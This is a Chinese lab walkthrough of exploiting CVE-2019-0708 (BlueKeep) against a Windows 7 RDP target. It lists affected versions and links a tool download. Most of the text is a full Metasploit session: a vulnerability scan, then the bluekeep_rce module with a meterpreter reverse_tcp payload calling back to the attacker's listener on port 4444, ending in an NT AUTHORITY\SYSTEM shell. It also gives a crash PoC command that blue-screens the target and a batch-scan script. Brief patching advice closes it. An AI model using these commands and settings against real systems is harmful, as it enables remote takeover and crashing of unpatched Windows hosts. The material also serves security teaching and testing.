CVE-2019-0708漏洞检测利用
漏洞详情
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
漏洞影响版本
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 Edition SP2
- Windows 8和Windows 10及之后版本的用户不受此漏洞影响
工具脚本分享
链接:https://pan.baidu.com/s/1iGZcW1OxmrYvdJEBdjlSgA?pwd=e3hr
提取码:e3hr
漏洞复现
1、复现环境
攻击机kali:192.168.80.128
靶机windwos7:192.168.80.129
2、windwos7开启远程桌面
点击允许远程访问。
3、在kali中启动msf,使用cve-2019-0708漏洞的扫描模板对靶机进行扫描。
msf6 > search 0708 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free 2 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution 3 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer msf6 > use 0 msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.80.129 rhosts => 192.168.80.129 msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
从扫描结果可以看到靶机存在该漏洞。
4、使用msf反弹shell
反弹shell的前提:靶机和攻击机互通。
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > search 0708 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free 2 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution 3 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use 1 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.80.129 rhosts => 192.168.80.129 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.80.128 lhost => 192.168.80.128 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444 lport => 4444 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets Exploit targets: Id Name -- ---- 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15) 5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1) 6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) 7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS) 8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM) msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1 target => 1 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.80.128:4444 [*] 192.168.80.129:3389 - Running automatic check ("set AutoCheck false" to disable) [*] 192.168.80.129:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [!] 192.168.80.129:3389 - <---------------- | Entering Danger Zone | ----------------> [*] 192.168.80.129:3389 - Surfing channels ... [*] 192.168.80.129:3389 - Lobbing eggs ... [*] 192.168.80.129:3389 - Forcing the USE of FREE'd object ... [!] 192.168.80.129:3389 - <---------------- | Leaving Danger Zone | ----------------> [*] Sending stage (200774 bytes) to 192.168.80.129 [*] Meterpreter session 1 opened (192.168.80.128:4444 -> 192.168.80.129:49159) at 2022-12-12 15:16:09 +0800 meterpreter > shell Process 2580 created. Channel 1 created. Microsoft Windows [▒汾 6.1.7601] ▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒ C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
其中设置target需要根据靶机的属性来原则,0代表自动根据指纹自动判断情况(不太好用),1代表真实机器,2代表目标系统在virtualbox虚拟机下运行,3、4、5代表代表目标系统在virtualbox虚拟机下运行,6代表目标系统在Hyper-V虚拟机下运行。如果用目标型号的targets利用不成功的话,就换其他的targets试一下(简单来说就是多试试就行了)
注:攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64的EXP不太稳定,针对 Windows 7 SP1 x64攻击有蓝屏现象。
批量检测脚本
windows下的python环境:
- 编辑3389_hosts,将待检测的IP地址写入文件,一行一个
- 命令行切换到代码所在的目录,运行python3 cve-2019-0708.py
蓝屏
使用漏洞POC进行测试: POC:https://github.com/n1xbyte/CVE-2019-0708 用法:python3 crashpoc.py ip地址 系统类型
靶机已蓝屏。
漏洞修复
及时打对应系统的安全补丁
关闭3389端口或添加防火墙安全策略限制对3389端口的访问
参考
https://cloud.tencent.com/developer/article/2069868